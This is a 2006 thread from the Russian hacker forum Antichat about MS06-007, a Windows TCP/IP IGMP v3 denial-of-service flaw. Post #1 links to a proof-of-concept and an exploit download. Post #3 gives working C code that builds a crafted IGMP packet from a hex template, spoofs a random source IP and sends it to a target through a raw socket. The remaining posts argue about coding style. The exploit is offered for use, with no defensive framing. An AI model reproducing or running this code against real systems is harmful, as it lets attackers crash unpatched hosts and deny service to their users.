ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
Перезагрузить страницу (IGMP v3) Denial of Service Exploit (MS06-007)
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

(IGMP v3) Denial of Service Exploit (MS06-007)
  #1  
Старый 22.03.2006, 00:48
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию (IGMP v3) Denial of Service Exploit (MS06-007)
Отказ в обслуживании в Microsoft Windows TCP/IP
http://www.securitylab.ru/poc/264136.php
сплоит - http://www.securitylab.ru/_download/...3/EvilIGMP.rar
раньше на секлабе орали скомпильте, теперь ревут дайте сорцы
 
Ответить с цитированием

  #2  
Старый 22.03.2006, 00:59
Аватар для tclover
tclover
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме:
9751364

Репутация: 1847


По умолчанию
 
Ответить с цитированием

  #3  
Старый 22.03.2006, 01:51
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию
Цитата:
теперь ревут дайте сорцы
хахаха
ребят, я конечно все понимаю, но посмотреть снифером пакет и потом его послать - не особо сложно... Вот что я сделал - работает:

Код:
static char IgmpTemplate[] =
"\x47\x00\x00\x2c\x00\x64\x00\x00\x80\x02"
"\x24\x63\x0a\x00\x00\x01\x0a\x00\x00\x09"
"\x00\x00\x00\x00\x00\x00\x00\x00\x11\x05"
"\x04\xef\xe0\x00\x00\x01\x00\x00\x00\x01"
"\x0a\x00\x00\x09";

int seq_no = 0;

void Igmp_Fill( char *buf, DWORD src_ip, DWORD dst_ip )
{
	_memcpy( buf, IgmpTemplate, 44 );
	ipheader *iph = (ipheader*)buf;
	iph->ip_sum   = 0;
	iph->ip_dst   = src_ip+1;
	if (!src_ip) src_ip = (rand() << 16) | rand();
	iph->ip_src   = src_ip;
	iph->ip_id    = seq_no++;
}

int IgmpExploit( DWORD src_ip, DWORD dst_ip )
{
	SOCKET s = _socket( PF_INET, SOCK_RAW, IPPROTO_RAW );	
	if (s == INVALID_SOCKET) return 0;

	int bOpt = 0;
	if (_setsockopt( s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof( bOpt ) ) == SOCKET_ERROR)
		return 0;

	if (!dst_ip) return 1;

	sockaddr_in s_a;
	s_a.sin_family = AF_INET;
	s_a.sin_addr.s_addr = dst_ip;

	char packet[44];
	_memset( packet, 0, 44 );

	Igmp_Fill( packet, src_ip, dst_ip );
	if (_sendto( s, packet, 44, 0, (struct sockaddr*)&s_a, sizeof( s_a ) ) == SOCKET_ERROR)
		return 2;

	_closesocket( s );

	return 3;
}
кто хоть чтото понял - разбереться в антиламере
Последний раз редактировалось KEZ; 22.03.2006 в 01:56..
 
Ответить с цитированием

  #4  
Старый 22.03.2006, 03:38
Аватар для grinay
grinay
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
Провел на форуме:
1212666

Репутация: 662
Отправить сообщение для grinay с помощью ICQ
По умолчанию
Блин кез не в обиду какая то у тебя манера странная написания сплоитов
iph->ip_sum = 0;
iph->ip_dst = src_ip+1;
if (!src_ip) src_ip = (rand() << 16) | rand();
чЕ ЗА НА
 
Ответить с цитированием

  #5  
Старый 22.03.2006, 09:18
Аватар для Elekt
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию
 
Ответить с цитированием

  #6  
Старый 22.03.2006, 17:55
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию
Цитата:
какая то у тебя манера странная написания сплоитов
Непонял, что тебе не понравилось в это фрагменте?

http://milw0rm.com/exploits/1599 - у меня помоему покороче будет...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Форумы 21 13.01.2007 23:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ